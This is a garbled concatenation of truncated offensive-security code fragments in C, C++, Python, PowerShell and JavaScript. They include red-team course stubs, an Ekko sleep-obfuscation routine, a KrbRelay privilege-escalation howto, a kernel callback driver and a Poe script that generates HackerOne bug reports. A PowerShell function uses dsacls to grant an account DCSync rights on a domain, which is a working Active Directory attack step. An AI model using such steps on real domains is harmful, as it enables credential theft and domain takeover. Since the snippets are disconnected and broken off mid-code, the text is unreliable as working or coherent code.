#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <windows.h>
#include "nt_crap.h"
#define ArrayCount(arr) (sizeof(arr)/sizeof(arr[0]))
#define assert(expr) if(!(expr)) { *(char*)0 = 0; }
# White Knight Labs - Offensive Development Course
# Guardrails - Folder Check
#include <windows.h> // Include Windows-specific headers for system calls
#include <iostream> // Include for input and output stream operations
#include <string> // Include for using string class
#include <algorithm> // Include for standard algorithms, e.g., std::transform
#include <cctype> // Include for character handling functions, e.g., std::tolower
// Function to check if the path of the current executable is under a specified path
import poe, sys
client = poe.Client("<POE_API_KEY_HERE>")
title=sys.argv[1]
path=sys.argv[2]
more=""
if len(sys.argv) > 3:
    more="\" and here is more information: "+sys.argv[3]
message="""generate a bug bounty report for me (hackerone.com), the title of the bug is """+title+""" and the vulnerability path is \""""+path+more+"""
#include <Core.h>
#include <Win32.h>
#include <Structs.h>
#include <Sleep.h>
#include <Utils.h>
SEC( text, C ) VOID Ekko ( DWORD SleepTime, PINSTANCE Instance)
{
Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.
No-Fix Local Privilege Escalation from low-privileged domain user to local system on domain-joined computers.
Prerequisites:
- LDAP signing not required on Domain Controller (default!)
function Invoke-SyncMeUp{
    [CmdletBinding()]
    Param (
        [Parameter(Mandatory=$True)]
        [string]$AccountName
    )
    $dse = [ADSI]"LDAP://Rootdse"
    $namingcontext = $dse.defaultNamingContext
    echo "Giving $AccountName DCSync rights"
    dsacls.exe $namingcontext /G $AccountName":CA;Replicating Directory Changes All" $AccountName":CA;Replicating Directory Changes"
#include <ntddk.h>
#define BLOCK_PROCESS "notepad.exe"
static OB_CALLBACK_REGISTRATION obcallback_registration;
static OB_OPERATION_REGISTRATION oboperation_callback;
#define PROCESS_CREATE_THREAD (0x0002)
#define PROCESS_CREATE_PROCESS (0x0080)
#define PROCESS_TERMINATE (0x0001)
#define PROCESS_VM_WRITE (0x0020)
#define PROCESS_VM_READ (0x0010)
#define PROCESS_VM_OPERATION (0x0008)
(() => {
  let gadgets = [];
  if (typeof _satellite !== 'undefined') {
    gadgets.push('Adobe Dynamic Tag Management');
  }
  if (typeof BOOMR !== 'undefined') {
    gadgets.push('Akamai Boomerang');
  }